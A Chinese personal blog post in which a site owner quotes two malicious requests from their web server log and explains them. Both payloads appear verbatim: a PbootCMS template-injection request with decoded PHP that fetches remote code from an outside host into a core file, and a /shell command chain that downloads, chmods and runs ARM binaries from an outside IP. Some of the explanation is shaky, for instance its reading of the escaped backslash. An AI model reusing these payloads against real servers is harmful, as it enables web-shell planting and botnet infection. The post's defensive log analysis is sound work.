GAMESH

游戏美术动画unity资源搬运工!

剧情党,完美控!
桐崎千棘
当前位置:首页 > 其他 > 正文内容

记录一次web攻击

admin4个月前 (08-07)其他158104

查看后台日志发现一段恶意攻击---》134.122.184.11 - - [07/Aug/2024:08:21:09 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22temp.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCcuL2NvcmUvYmFzaWMvZnVuLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9kLnNvZ291YWQudmlwL3R4dC9vdGUudHh0JykpOwplY2hvICd0ZW1wMTExODg4JzsKdW5saW5rKF9fRklMRV9fKTs=\x22)))}{/pboot:if}/../../?p=14 HTTP/1.1" 301 162 "http://n666888.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"


这段内容看起来是一段服务器访问日志的记录。其中包含了访问者的 IP 地址(134.122.184.11)、访问时间(2024 年 8 月 7 日 8 时 21 分 09 秒)、请求方式(GET)、请求的路径(/ {...} /../../?p=14)、HTTP 协议版本(1.1)、返回的状态码(301)、传输的数据量(162 字节)、来源网址(n666888)以及用户代理(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36)。


需要注意的是,请求路径中的一些代码部分看起来像是恶意或可疑的操作,可能存在安全风险。例如,其中的“file_put_contents”和“base64_decode”等函数的使用方式不太正常。

请求行

  • 方法: GET

  • URL: /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22temp.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCcuL2NvcmUvYmFzaWMvZnVuLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9kLnNvZ291YWQudmlwL3R4dD9vdGUudHh0JykpOwplY2hvICd0ZW1wMTExODg4JzsKdW5saW5rKF9fRklMRV9fKTs=\x22)))}{/pboot:if}/../../?p=14

    • 这部分URL经过精心构造,尝试绕过安全过滤和检查。它使用了{pboot:if(...)}{/pboot:if}这样的结构,可能是在尝试利用某个CMS(如PbootCMS)的模板注入漏洞。

    • \x22是十六进制表示的引号("),用于绕过某些检测机制。

    • file_put_contentsbase64_decode函数被用于在服务器上写入文件(temp.php),这个文件的内容是经过Base64编码的PHP代码。

    • 解码后的PHP代码大致如下:

<?php  
file_put_contents('./core/basic/fun.php', file_get_contents('http://d.sogouad.vip/txt/ote.txt'));  
echo 'temp11888';  
unlink(__FILE__);



    • 这段代码尝试从远程URL(http://d.sogouad.vip/txt/ote.txt)下载内容并保存到服务器上的./core/basic/fun.php文件,然后删除自身(unlink(__FILE__);)。

  • HTTP版本: HTTP/1.1

状态行

  • 状态码: 301

    • 这通常表示请求的资源已永久移动到新位置,但在这种情况下,它可能是服务器对非法请求的默认响应,或者是服务器配置导致的重定向。

  • 响应大小: 162 字节

  • 引用页: http://n666888.com

用户代理

  • 用户代理字符串: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36

    • 这是一个模拟Chrome浏览器的用户代理字符串,用于伪装正常用户的浏览器访问。

第二个攻击-----》185.224.128.83 - - [07/Aug/2024:08:27:24 +0800] "GET /shell?cd+/tmp;rm+earm+earm5+earm7;nohup+wget+http:/\x5C/154.216.20.232/earm7;chmod+777+earm7;./earm7+jaws;nohup+wget+http:/\x5C/154.216.20.232/earm5;chmod+777+earm5;./earm5+jaws;nohup+wget+http:/\x5C/154.216.20.232/earm;chmod+777+earm;./earm+jaws HTTP/1.1" 301 162 "-" "KrebsOnSecurity"

这条日志记录了一个尝试通过HTTP GET请求在服务器上执行恶意命令的尝试。然而,需要注意的是,HTTP GET请求本身并不支持在服务器上执行命令;这里的尝试似乎是对Web服务器的一个误解或滥用。不过,从URL的结构和内容来看,攻击者显然在尝试利用某个Web应用程序的漏洞来执行一系列恶意操作。

以下是对URL中尝试执行的操作的解析:

  1. 尝试删除文件:cd+/tmp;rm+earm+earm5+earm7

    • 这部分尝试切换到/tmp目录(但cd命令后应有空格分隔,这里可能是格式错误或尝试绕过检测),然后删除名为earmearm5earm7的文件。但由于+通常不被shell用作命令分隔符(而是空格或;),且URL编码可能不正确(\x5C是反斜杠\的十六进制表示,但在URL中应直接写为/),因此这部分可能不会按预期执行。

  2. 下载并执行恶意文件:

    • nohup+wget+http:/\x5C/154.216.20.232/earm7;chmod+777+earm7;./earm7+jaws

    • 这部分尝试使用wget命令从http://154.216.20.232/(注意URL中的\x5C应该是/的误用)下载名为earm7的文件,然后将其权限更改为777(即允许所有用户读写执行),最后尝试执行该文件并传递参数jaws

    • 类似的操作还尝试下载并执行earm5earm文件。

  3. 状态码和响应大小:

    • 状态码301表示请求的资源已永久移动到新位置,这通常不是由执行恶意命令导致的,而更可能是服务器配置或Web应用程序的默认响应。

    • 响应大小162字节可能表示服务器返回的响应体的大小,而不是实际执行的命令的结果。

  4. 引用页和用户代理:

    • 引用页为"-",表示没有提供引用页信息。

    • 用户代理为KrebsOnSecurity,这很可能是一个伪造的用户代理字符串,用于伪装身份或绕过某些检测机制。实际上,KrebsOnSecurity是一个知名的网络安全博客,其名称被滥用在这里。


扫描二维码推送至手机访问。

本サイト上に掲載の文章、画像、写真などを無断で複製することは法律で禁じられています。全ての著作権はGAMESHに帰属します。

本文链接:https://www.pylblog.com/post/261.html

分享给朋友:
返回列表

上一篇:LEDE编译出错recipe for target 'install' failed

没有最新的文章了...

相关文章

远程监控

远程监控

今天用曾经捡来的一部破手机完成了一个远程监控系统,以后可以从任何地方看到家里状况!大家可以看看效果!登陆用户名和密码都是admin    ...

西部数码虚拟主机设置全站https的301跳转

西部数码虚拟主机设置全站https的301跳转

近期为了迎合大众我也将网站开启了https,虽然https启用了,但是http仍可以正常访问,然而百度那边要求站长全站启用https!无奈我只好设置301跳转,可是当我在php里加入跳转代码浏览器却无...

openwrt安装php服务uhttpd+php 80端口

openwrt安装php服务uhttpd+php 80端口

想在openwrt运行php但是我又不想单独加一个端口,想和luci并存,在网上找到了一个教程,这里记录一下以便以后使用!1.安装php可以直接在luci界面使用 系统-》软件包-》php...

东

云对雨,雪对风,晚照对晴空。来鸿对去燕,宿鸟对鸣虫。三尺剑,六钧弓,岭北对江东。人间清暑殿,天上广寒宫。两岸晓烟杨柳绿,一园春雨杏花红。两鬓风霜,途次早行之客;一蓑烟雨,溪边晚钓之翁。 &nbs...

NEWIFI入手

NEWIFI入手

作为一款智能路由器NEWIFIMINI可谓是十分大众化的,性价比非常高!产品名称:新路由NewifiMini (新路由Y1) 产品型号:R6830 产品尺寸:130.2mm*120.8mm...

用WIN10搭建web服务器

用WIN10搭建web服务器

最近在淘宝花两百多块钱买了一台小主机拿来做web服务器,开始商家给装的xp系统,我已将好多年没用xp了,对xp很不习惯,所以我今天换了win10!本来打算还是用win7的,但是突然想体验一下win10...

评论列表

游客
3个月前 (09-12)

十分赞同楼主!

指尖网
3个月前 (09-13)

网页的加载速度非常快,不会影响用户体验。

Clash官方网站
2周前 (11-28)

楼主是我最崇拜的人!

小林子
小林子
1周前 (11-29)

楼主第一个攻击怎么解决的

发表评论

访客

看不清,换一张

QQ登录
◎欢迎参与讨论,请在这里发表您的看法和观点。